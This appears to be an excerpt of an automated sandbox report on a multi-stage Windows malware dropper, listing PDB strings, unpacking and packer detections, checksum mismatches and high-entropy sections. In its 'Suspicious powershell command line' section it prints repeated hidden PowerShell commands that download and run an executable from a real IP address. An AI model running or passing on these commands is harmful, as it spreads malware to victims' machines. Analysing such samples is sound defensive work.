                                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593203015.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdbUGP source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600657542.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589681525.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: trano1221.exe, 0000002A.00000002.1975488711.00007FF98BB50000.00000040.00000001.01000000.00000033.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb}},GCTL source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: trano1221.exe, 0000002A.00000002.1986859487.00007FF98C331000.00000040.00000001.01000000.00000036.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1596701757.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591525735.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb** source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588821073.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598775483.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1590455368.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599693153.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: trano1221.exe, 00000023.00000003.1592148006.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E76B000.00000040.00000001.01000000.0000001C.sdmp
                                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591309503.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599866003.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600849374.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593372329.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598137593.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593530214.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: trano1221.exe, 00000023.00000003.1589513980.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600027684.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1590256912.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589946129.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1941606459.000001E16B3B0000.00000002.00000001.01000000.0000001E.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdb source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599377266.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600505618.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: trano1221.exe, 0000002A.00000002.1984942451.00007FF98C2E1000.00000040.00000001.01000000.0000002B.sdmp

                                      Data Obfuscation

                                      barindex
                                      Detected unpacking (changes PE section rights)
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeUnpacked PE file: 0.2.M6gQuZPvgY.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 2.2.rapes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 3.2.rapes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEUnpacked PE file: 34.2.TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeUnpacked PE file: 45.2.c1f0508103.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zzezzonx:EW;iactdlgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zzezzonx:EW;iactdlgu:EW;.taggant:EW;
                                      Detected unpacking (creates a PE file in dynamic memory)
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeUnpacked PE file: 17.2.m0wsoI3.exe.60900000.1.unpack
                                      .NET source code contains method to dynamically call methods (often used by packers)
                                      Source: cronikxqqq[1].exe.15.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                      Source: cronikxqqq.exe.15.dr, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                                      Suspicious powershell command line found
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: cronikxqqq[1].exe.15.drStatic PE information: 0xB00FDD35 [Wed Aug 8 20:14:45 2063 UTC]
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00409220
                                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                      Source: crypted.41[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0xbd7a2
                                      Source: unicodedata.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x57bc8
                                      Source: random[1].exe2.6.drStatic PE information: real checksum: 0x1b3266 should be: 0x1bd361
                                      Source: crypted.exe0.15.drStatic PE information: real checksum: 0x0 should be: 0xbd7a2
                                      Source: pyexpat.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x1e8c7
                                      Source: UD49QH6[1].exe.6.drStatic PE information: real checksum: 0x1cc568 should be: 0x1ce71d
                                      Source: m0wsoI3[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x37032
                                      Source: m0wsoI3.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x37032
                                      Source: 83f34278c7.exe.6.drStatic PE information: real checksum: 0x2027df should be: 0x202602
                                      Source: _imagingcms.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x27dbf
                                      Source: _cffi.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x40487
                                      Source: _asyncio.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0xd8f5
                                      Source: cronikxqqq.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x79c75
                                      Source: backend_c.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x385b6
                                      Source: _win32sysloader.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0xefa5
                                      Source: pywintypes311.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x1cc1e
                                      Source: d101bd5267.exe.6.drStatic PE information: real checksum: 0x1b3266 should be: 0x1bd361
                                      Source: select.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0xda93
                                      Source: random[1].exe1.6.drStatic PE information: real checksum: 0x207f0e should be: 0x203fd2
                                      Source: python311.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x1a7a57
                                      Source: libssl-3.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x47441
                                      Source: mrwipre12[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0x8788c
                                      Source: futors.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x724e5
                                      Source: amnew[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x724e5
                                      Source: mrwipre12.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x8788c
                                      Source: win32api.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x18ee4
                                      Source: v7942[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0x63e10
                                      Source: M6gQuZPvgY.exeStatic PE information: real checksum: 0x2160e8 should be: 0x216ef4
                                      Source: rapes.exe.0.drStatic PE information: real checksum: 0x2160e8 should be: 0x216ef4
                                      Source: _imagingft.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0xb785c
                                      Source: crypted.7[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0x78b87
                                      Source: 0629403be8.exe.6.drStatic PE information: real checksum: 0x207f0e should be: 0x203fd2
                                      Source: _webp.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x31963
                                      Source: dw[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0xf920
                                      Source: crypted.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x78b87
                                      Source: pythoncom311.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x33c75
                                      Source: _rust.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x22b568
                                      Source: win32trace.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x12e28
                                      Source: md.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x3c52
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: real checksum: 0x2160e8 should be: 0x216ef4
                                      Source: c1f0508103.exe.6.drStatic PE information: real checksum: 0x1d229c should be: 0x1d7014
                                      Source: v7942.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x63e10
                                      Source: cronikxqqq[1].exe.15.drStatic PE information: real checksum: 0x0 should be: 0x79c75
                                      Source: dw.exe.15.drStatic PE information: real checksum: 0x0 should be: 0xf920
                                      Source: _imaging.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0xc8e1b
                                      Source: _imagingmath.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x4f30
                                      Source: amnew.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x724e5
                                      Source: md__mypyc.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x16981
                                      Source: libffi-8.dll.35.drStatic PE information: real checksum: 0x0 should be: 0xa3d3
                                      Source: random[1].exe0.6.drStatic PE information: real checksum: 0x1d229c should be: 0x1d7014
                                      Source: libcrypto-3.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x195369
                                      Source: _speedups.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0xf007
                                      Source: _imagingtk.cp311-win_amd64.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x1054a
                                      Source: win32ui.pyd.35.drStatic PE information: real checksum: 0x0 should be: 0x4e017
                                      Source: UD49QH6.exe.6.drStatic PE information: real checksum: 0x1cc568 should be: 0x1ce71d
                                      Source: random[2].exe.6.drStatic PE information: real checksum: 0x2027df should be: 0x202602
                                      Source: M6gQuZPvgY.exeStatic PE information: section name:
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: .idata
                                      Source: M6gQuZPvgY.exeStatic PE information: section name:
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: zwbixhzy
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: murqhuul
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: .taggant
                                      Source: rapes.exe.0.drStatic PE information: section name:
                                      Source: rapes.exe.0.drStatic PE information: section name: .idata
                                      Source: rapes.exe.0.drStatic PE information: section name:
                                      Source: rapes.exe.0.drStatic PE information: section name: zwbixhzy
                                      Source: rapes.exe.0.drStatic PE information: section name: murqhuul
                                      Source: rapes.exe.0.drStatic PE information: section name: .taggant
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name:
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: .idata
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name:
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: nafweblw
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: crjcyqmk
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: .taggant
                                      Source: UD49QH6.exe.6.drStatic PE information: section name:
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: .idata
                                      Source: UD49QH6.exe.6.drStatic PE information: section name:
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: nafweblw
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: crjcyqmk
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: .taggant
                                      Source: m0wsoI3[1].exe.6.drStatic PE information: section name:
                                      Source: m0wsoI3.exe.6.drStatic PE information: section name:
                                      Source: random[1].exe0.6.drStatic PE information: section name:
                                      Source: random[1].exe0.6.drStatic PE information: section name: .idata
                                      Source: random[1].exe0.6.drStatic PE information: section name:
                                      Source: random[1].exe0.6.drStatic PE information: section name: zzezzonx
                                      Source: random[1].exe0.6.drStatic PE information: section name: iactdlgu
                                      Source: random[1].exe0.6.drStatic PE information: section name: .taggant
                                      Source: c1f0508103.exe.6.drStatic PE information: section name:
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: .idata
                                      Source: c1f0508103.exe.6.drStatic PE information: section name:
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: zzezzonx
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: iactdlgu
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: .taggant
                                      Source: random[2].exe.6.drStatic PE information: section name:
                                      Source: random[2].exe.6.drStatic PE information: section name: .idata
                                      Source: random[2].exe.6.drStatic PE information: section name:
                                      Source: random[2].exe.6.drStatic PE information: section name: lmgreshx
                                      Source: random[2].exe.6.drStatic PE information: section name: wvhccysx
                                      Source: random[2].exe.6.drStatic PE information: section name: .taggant
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name:
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: .idata
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name:
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: lmgreshx
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: wvhccysx
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: .taggant
                                      Source: random[1].exe1.6.drStatic PE information: section name:
                                      Source: random[1].exe1.6.drStatic PE information: section name: .idata
                                      Source: random[1].exe1.6.drStatic PE information: section name:
                                      Source: random[1].exe1.6.drStatic PE information: section name: jtqqduow
                                      Source: random[1].exe1.6.drStatic PE information: section name: batwxedy
                                      Source: random[1].exe1.6.drStatic PE information: section name: .taggant
                                      Source: 0629403be8.exe.6.drStatic PE information: section name:
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: .idata
                                      Source: 0629403be8.exe.6.drStatic PE information: section name:
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: jtqqduow
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: batwxedy
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: .taggant
                                      Source: random[1].exe2.6.drStatic PE information: section name:
                                      Source: random[1].exe2.6.drStatic PE information: section name: .idata
                                      Source: random[1].exe2.6.drStatic PE information: section name:
                                      Source: random[1].exe2.6.drStatic PE information: section name: tojgfqvj
                                      Source: random[1].exe2.6.drStatic PE information: section name: wmllaexh
                                      Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                                      Source: d101bd5267.exe.6.drStatic PE information: section name:
                                      Source: d101bd5267.exe.6.drStatic PE information: section name: .idata
                                      Source: d101bd5267.exe.6.drStatic PE information: section name:
                                      Source: d101bd5267.exe.6.drStatic PE information: section name: tojgfqvj
                                      Source: d101bd5267.exe.6.drStatic PE information: section name: wmllaexh
                                      Source: d101bd5267.exe.6.drStatic PE information: section name: .taggant
                                      Source: cronikxqqq[1].exe.15.drStatic PE information: section name: .CSS
                                      Source: cronikxqqq.exe.15.drStatic PE information: section name: .CSS
                                      Source: v7942[1].exe.15.drStatic PE information: section name: .gxfg
                                      Source: v7942[1].exe.15.drStatic PE information: section name: .retplne
                                      Source: v7942[1].exe.15.drStatic PE information: section name: _RDATA
                                      Source: v7942.exe.15.drStatic PE information: section name: .gxfg
                                      Source: v7942.exe.15.drStatic PE information: section name: .retplne
                                      Source: v7942.exe.15.drStatic PE information: section name: _RDATA
                                      Source: mozglue.dll.17.drStatic PE information: section name: .didat
                                      Source: msvcp140.dll.17.drStatic PE information: section name: .didat
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name:
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: .idata
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name:
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: zwbixhzy
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: murqhuul
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: .taggant
                                      Source: libffi-8.dll.35.drStatic PE information: section name: UPX2
                                      Source: mfc140u.dll.35.drStatic PE information: section name: .didat
                                      Source: VCRUNTIME140.dll.35.drStatic PE information: section name: _RDATA
                                      Source: _rust.pyd.35.drStatic PE information: section name: UPX2
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_009572EF pushad ; iretd 13_2_009572F0
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_00969FC1 push ecx; ret 13_2_00969FD4
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_003F72EF pushad ; iretd 14_2_003F72F0
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_00409FC1 push ecx; ret 14_2_00409FD4
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60983000 pushad ; iretd 17_2_60983031
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_6096D990 push eax; ret 17_2_6096D9C0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60911F9E push ecx; mov dword ptr [esp], ebx17_2_60911FD3
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_60987F71 pushad ; iretd 17_2_60987F74
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_00660A76 push ecx; ret 18_2_00660A89
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: entropy: 7.071163489335255
                                      Source: M6gQuZPvgY.exeStatic PE information: section name: zwbixhzy entropy: 7.954713744727896
                                      Source: rapes.exe.0.drStatic PE information: section name: entropy: 7.071163489335255
                                      Source: rapes.exe.0.drStatic PE information: section name: zwbixhzy entropy: 7.954713744727896
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: entropy: 7.980512869522268
                                      Source: UD49QH6[1].exe.6.drStatic PE information: section name: nafweblw entropy: 7.953826641975752
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: entropy: 7.980512869522268
                                      Source: UD49QH6.exe.6.drStatic PE information: section name: nafweblw entropy: 7.953826641975752
                                      Source: m0wsoI3[1].exe.6.drStatic PE information: section name: .text entropy: 7.245682295128179
                                      Source: m0wsoI3.exe.6.drStatic PE information: section name: .text entropy: 7.245682295128179
                                      Source: random[1].exe0.6.drStatic PE information: section name: entropy: 7.986903868538746
                                      Source: random[1].exe0.6.drStatic PE information: section name: zzezzonx entropy: 7.954384918744277
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: entropy: 7.986903868538746
                                      Source: c1f0508103.exe.6.drStatic PE information: section name: zzezzonx entropy: 7.954384918744277
                                      Source: random[2].exe.6.drStatic PE information: section name: entropy: 7.169971330525206
                                      Source: random[2].exe.6.drStatic PE information: section name: lmgreshx entropy: 7.954460534575886
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: entropy: 7.169971330525206
                                      Source: 83f34278c7.exe.6.drStatic PE information: section name: lmgreshx entropy: 7.954460534575886
                                      Source: random[1].exe1.6.drStatic PE information: section name: entropy: 7.14420663079945
                                      Source: random[1].exe1.6.drStatic PE information: section name: jtqqduow entropy: 7.953455836557056
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: entropy: 7.14420663079945
                                      Source: 0629403be8.exe.6.drStatic PE information: section name: jtqqduow entropy: 7.953455836557056
                                      Source: random[1].exe2.6.drStatic PE information: section name: tojgfqvj entropy: 7.953511808501187
                                      Source: d101bd5267.exe.6.drStatic PE information: section name: tojgfqvj entropy: 7.953511808501187
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: entropy: 7.071163489335255
                                      Source: TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.25.drStatic PE information: section name: zwbixhzy entropy: 7.954713744727896
